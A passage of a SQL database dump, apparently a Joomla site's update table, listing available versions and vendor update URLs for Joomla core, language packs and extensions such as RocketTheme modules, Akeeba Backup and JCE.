Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(27840,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.46','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(27841,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(27842,20,0,'RokCandy Extension','','rokcandy','plugin','system',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/302/2df8a4e2','',''),(27843,20,0,'RokGallery','','','component','',0,'2.46','0802','http://updates.rockettheme.com/joomla/313/1985305838','',''),(27844,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(27845,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(27846,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(27847,20,0,'RokCommon','','pkg_rokcommon','package','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/559/1033ef39','',''),(27848,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(27849,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(27850,57,0,'French','','pkg_fr-FR','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(27851,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(27852,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(27853,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(27854,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(27855,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(27856,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(27857,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(27858,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(27859,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(27860,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(27861,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(27862,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(27863,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(27864,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(27865,57,0,'Latvian','','pkg_lv-LV','package','',0,'3.9.25.2','','https://update.joomla.org/language/details3/lv-LV_details.xml','',''),(27866,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(27867,57,0,'Norwegian Bokmal','','pkg_nb-NO','package','',0,'3.9.24.2','','https://update.joomla.org/language/details3/nb-NO_details.xml','',''),(27868,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(27869,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(27870,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(27871,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(27872,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(27873,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(27874,57,0,'English US','','pkg_en-US','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(27875,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(27876,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(27877,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(27878,57,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(27879,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(27880,57,0,'Basque','','pkg_eu-ES','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/eu-ES_details.xml','',''),(27881,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(27882,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(27883,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(27884,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(27885,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(27886,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(27887,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(27888,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(27889,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(27890,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(27891,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(27892,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(27893,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(27894,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(27895,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(27896,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(27897,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(27898,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(27899,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(27900,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-2.html',''),(27901,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.4.3FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer/features',''),(27902,122,0,'Google Structured Data Free','Google Structured Data Free','gsd','plugin','system',1,'4.8.5','','https://static.tassos.gr/update/gsdfree?type=.xml','\n			https://www.tassos.gr/releases/google-structured-data-markup/google-structured-data-markup-4-8-5			\n		',''),(27903,129,0,'JCE 2.9.4','Installation package for Joomla! 3.x and 4.x','pkg_jce','package','',0,'2.9.4','','https://cdn.joomlacontenteditor.net/updates/xml/editor/pkg_jce.xml','https://www.joomlacontenteditor.net/news/jce-pro-2-9-4-released',''),(27904,1,0,'Joomla','','joomla','file','',0,'3.9.25','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(27905,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-2.html',''),(27906,1,0,'Joomla','','joomla','file','',0,'3.9.25','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(27907,1,0,'Joomla','','joomla','file','',0,'3.9.25','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(27908,1,0,'Joomla','','joomla','file','',0,'3.9.25','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(27909,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(27910,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(27911,3,0,'French','','pkg_fr-FR','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(27912,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(27913,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(27914,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(27915,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(27916,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(27917,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(27918,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(27919,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(27920,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(27921,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(27922,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(27923,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(27924,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(27925,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(27926,3,0,'Latvian','','pkg_lv-LV','package','',0,'3.9.25.2','','https://update.joomla.org/language/details3/lv-LV_details.xml','',''),(27927,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(27928,3,0,'Norwegian Bokmal','','pkg_nb-NO','package','',0,'3.9.24.2','','https://update.joomla.org/language/details3/nb-NO_details.xml','',''),(27929,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(27930,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(27931,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(27932,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(27933,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(27934,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(27935,3,0,'English US','','pkg_en-US','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(27936,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(27937,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(27938,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(27939,3,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(27940,3,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(27941,3,0,'Basque','','pkg_eu-ES','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/eu-ES_details.xml','',''),(27942,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(27943,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(27944,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(27945,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(27946,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(27947,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(27948,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(27949,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(27950,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(27951,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(27952,3,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(27953,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(27954,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(27955,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(27956,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(27957,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(27958,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(27959,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(27960,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(27961,1,0,'Joomla','','joomla','file','',0,'3.9.25','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(27962,20,0,'RokSprocket Module','','mod_roksprocket','module','',0,'2.1.28','0802','http://updates.rockettheme.com/joomla/138/b61e70db','',''),(27963,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(27964,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.46','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(27965,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(27966,20,0,'RokCandy Extension','','rokcandy','plugin','system',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/302/2df8a4e2','',''),(27967,20,0,'RokGallery','','','component','',0,'2.46','0802','http://updates.rockettheme.com/joomla/313/1985305838','',''),(27968,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(27969,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(27970,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(27971,20,0,'RokCommon','','pkg_rokcommon','package','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/559/1033ef39','',''),(27972,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(27973,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(27974,57,0,'French','','pkg_fr-FR','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(27975,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(27976,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(27977,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(27978,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(27979,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(27980,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(27981,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(27982,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(27983,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(27984,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(27985,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(27986,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(27987,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(27988,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(27989,57,0,'Latvian','','pkg_lv-LV','package','',0,'3.9.25.2','','https://update.joomla.org/language/details3/lv-LV_details.xml','',''),(27990,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(27991,57,0,'Norwegian Bokmal','','pkg_nb-NO','package','',0,'3.9.24.2','','https://update.joomla.org/language/details3/nb-NO_details.xml','',''),(27992,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(27993,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(27994,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(27995,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(27996,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(27997,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(27998,57,0,'English US','','pkg_en-US','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(27999,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(28000,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(28001,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(28002,57,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(28003,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(28004,57,0,'Basque','','pkg_eu-ES','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/eu-ES_details.xml','',''),(28005,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(28006,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(28007,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(28008,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(28009,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(28010,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(28011,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(28012,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(28013,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(28014,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(28015,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(28016,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(28017,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(28018,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(28019,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(28020,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(28021,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(28022,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(28023,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(28024,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-2.html',''),(28025,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.4.3FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer/features',''),(28026,122,0,'Google Structured Data Free','Google Structured Data Free','gsd','plugin','system',1,'4.8.5','','https://static.tassos.gr/update/gsdfree?type=.xml','\n			https://www.tassos.gr/releases/google-structured-data-markup/google-structured-data-markup-4-8-5			\n		',''),(28027,129,0,'JCE 2.9.4','Installation package for Joomla! 3.x and 4.x','pkg_jce','package','',0,'2.9.4','','https://cdn.joomlacontenteditor.net/updates/xml/editor/pkg_jce.xml','https://www.joomlacontenteditor.net/news/jce-pro-2-9-4-released',''),(28028,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.3','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-3.html',''),(28029,1,0,'Joomla','','joomla','file','',0,'3.9.25','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28030,1,0,'Joomla','','joomla','file','',0,'3.9.25','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28031,1,0,'Joomla','','joomla','file','',0,'3.9.25','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28032,1,0,'Joomla','','joomla','file','',0,'3.9.25','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28033,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.3','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-3.html',''),(28034,1,0,'Joomla','','joomla','file','',0,'3.9.25','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28035,1,0,'Joomla','','joomla','file','',0,'3.9.25','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28036,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.3','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-3.html',''),(28037,1,0,'Joomla','','joomla','file','',0,'3.9.25','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28038,1,0,'Joomla','','joomla','file','',0,'3.9.25','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28039,1,0,'Joomla','','joomla','file','',0,'3.9.25','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28040,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.3','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-3.html',''),(28041,1,0,'Joomla','','joomla','file','',0,'3.9.25','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28042,1,0,'Joomla','','joomla','file','',0,'3.9.25','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28043,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(28044,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(28045,3,0,'French','','pkg_fr-FR','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(28046,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(28047,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(28048,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(28049,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(28050,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(28051,3,0,'Arabic 